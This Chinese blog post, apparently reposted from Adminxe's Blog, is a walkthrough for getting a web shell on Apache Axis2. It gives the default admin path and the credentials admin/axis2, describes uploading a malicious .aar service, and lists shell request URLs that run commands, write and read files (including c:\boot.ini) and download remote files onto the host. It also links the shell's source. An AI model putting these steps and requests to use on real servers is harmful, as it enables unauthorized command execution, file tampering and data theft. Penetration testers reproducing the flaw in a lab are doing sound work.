Apache Axis2 后台文件上传getshell 漏洞复现


Apache Axis2 后台文件上传getshell 漏洞复现

0x00 前言

Apache Axis2是一个Web服务的核心支援引擎。AXIS2对旧有的AXIS重新设计及重写,并提供两种语言JavaC的开发版本。

事实上AXIS2 不只为WEB应用程序提供Web服务的界面,而且它也可以作为一个单独的服务器看待,而且很简单就能跟Apache Tomcat整合,目前AXIS2的最新版本是1.6.2。

Axis是一个开源、基于XML的Web服务架构。最开始由IBM公司研发,叫IBM-SOAP。后来由Apache基金会在SOAP的基础上推出了AXIS。AXIS本质是一个Java语言编写的SOAP引擎。利用它我们可以在各种分布式应用中,让各个应用能够彼此操作、交互。

Apache Axis2 后台文件上传getshell 漏洞复现

0x01 漏洞复现

默认端口:8089

默认后台路径:/axis2-admin/login

默认账号密码:admin/axis2

Apache Axis2 后台文件上传getshell 漏洞复现

选择Tools-“ Upload Service ”上传aar包 进行 getshell

Apache Axis2 后台文件上传getshell 漏洞复现Apache Axis2 后台文件上传getshell 漏洞复现

成功后会提示“ File AxisInvoker.aar successfully uploaded  ”

http://xxx.xxx.xxx.xxx/axis2/services/Cat/exec?cmd=ipconfig

Apache Axis2 后台文件上传getshell 漏洞复现

0x02 使用方法

马子的使用方法:

支持的命令:
exec-运行命令,在Linux / Windows上均可使用,不用担心。
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/exec?cmd=whoami
 
写-写文件
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/write?path=c:\1.1txt&content=123
 
info-显示某些信息,根据需要进行修改
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/info
 
读取-读取文件内容
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/read?path=c:\boot.ini
 
下载-下载文件并将其保存在某处
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/download?url=http://www.baidu.com&file=c:\122.txt

下载地址:https://github.com/CaledoniaProject/AxisInvoker

转载请注明:Adminxe‘s Blog ? Apache Axis2 后台文件上传getshell 漏洞复现

 

Apache Axis2 后台文件上传getshell 漏洞复现

上一篇:Entity Framework 6 Recipes 2nd Edition(11-11)译 -> 在LINQ中调用数据库函数


下一篇:LINQ和.NET数据访问